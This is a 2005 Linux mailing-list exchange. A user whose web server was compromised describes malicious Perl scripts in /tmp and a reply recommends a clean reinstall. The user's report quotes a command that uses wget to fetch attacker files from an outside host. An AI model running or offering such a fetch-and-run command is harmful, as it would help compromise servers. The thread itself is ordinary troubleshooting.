Server compromissed
Michael A. Peters
mpeters at mac.com
Fri Feb 18 06:31:56 UTC 2005
On 02/17/2005 10:20:02 PM, paul at topguncomputers.com wrote:
> Apparently someone has hacked into my webserver. And is installing
> perl
> scripts into he /tmp/ directory. There usually named .linuxday* or
> .cinta* and a few other names as well.
>
> >From what I can tell something is causing apache to run a command
> like "sh
> wget bot.linuxday.com.br -O {the above mentioned files are than
> listed}"
>
> sometimes the site is worm.linuxday.com.br
>
> I'm curious if anyone has heard about this before. I'm currently
> running
> Fedora 1 with all the latests security patches.
It might not be a vulnerable package, it might be vulnerable code on
your server.
Anyway - you've been compromised which means you probably have already
had trojans installed - a clean install would be a good idea - and I
would suggest something not legacy. IE fc3.
--
Michael A. Peters
http://mpeters.us/
More information about the users
mailing list